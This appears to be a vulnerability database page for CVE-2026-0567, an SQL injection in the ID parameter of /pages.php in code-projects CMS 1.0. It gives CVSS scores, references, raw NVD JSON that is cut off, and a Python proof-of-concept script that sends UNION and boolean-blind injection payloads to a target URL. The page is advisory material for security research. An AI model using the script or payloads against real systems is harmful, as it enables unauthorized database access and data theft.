CVE-2026-0567

Description

A vulnerability was detected in code-projects Content Management System 1.0. The affected element is an unknown function of the file /pages.php. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit is now public and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:code-projects:content_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Content Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-0567 SQL Injection PoC
# Target: code-projects Content Management System 1.0
# Vulnerable File: /pages.php
# Vulnerable Parameter: ID

import requests
import sys

def exploit_sqli(target_url, payload):
    """Execute SQL injection payload on vulnerable parameter"""
    target = f"{target_url}/pages.php?ID={payload}"
    try:
        response = requests.get(target, timeout=10)
        return response.text
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve_2026_0567.py <target_url>")
        print("Example: python cve_2026_0567.py http://localhost/code-projects-cms")
        sys.exit(1)
    
    target_url = sys.argv[1].rstrip('/')
    
    # Test payload - Database version extraction
    payload = "1' UNION SELECT NULL,version(),NULL,NULL,NULL-- -
"
    print(f"[*] Testing SQL injection on {target_url}/pages.php")
    print(f"[*] Payload: {payload}")
    
    result = exploit_sqli(target_url, payload)
    if result:
        print(f"[+] Response received, length: {len(result)}")
        if '5.' in result or '8.' in result or '10.' in result or 'MariaDB' in result:
            print("[+] Potential SQL injection confirmed!")
            print("[+] Database version information found in response")
    
    # Blind boolean-based injection test
    true_payload = "1' AND 1=1-- -
"
    false_payload = "1' AND 1=2-- -
"
    
    print("[*] Testing blind boolean injection...")
    true_resp = exploit_sqli(target_url, true_payload)
    false_resp = exploit_sqli(target_url, false_payload)
    
    if true_resp and false_resp and len(true_resp) != len(false_resp):
        print("[+] Blind SQL injection confirmed!")
        print("[+] Application behaves differently based on SQL condition")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0567
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0567
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0567/
[4] VulDB https://vuldb.com/cve/CVE-2026-0567
[5] https://code-projects.org/
[6] https://github.com/Limingqian123/CVE/issues/14
[7] https://vuldb.com/?ctiid.339379
[8] https://vuldb.com/?id.339379
[9] https://vuldb.com/?submit.729229

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0567", "sourceIdentifier": "[email protected]", "published": "2026-01-02T18:15:54.747", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in code-projects Content Management System 1.0. The affected element is an unknown function of the file /pages.php. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit is now public and may be used."}, {"lang": "es", "value": "Una vulnerabilidad fue detectada en code-projects Content Management System 1.0. El elemento afectado es una función desconocida del archivo /pages.php. La manipulación del argumento ID resulta en inyección SQL. El ataque puede ser realizado desde remoto. El exploit es ahora público y puede ser usado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:code-projects:content_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "02CCDB18-7E64-4F10-9D59-7781D4806075"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Limingqian123/CVE/issues/14", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339379", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339379", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.729229", "source": "[email protected]", "tags": ["Third Party Advisory", ... (truncated)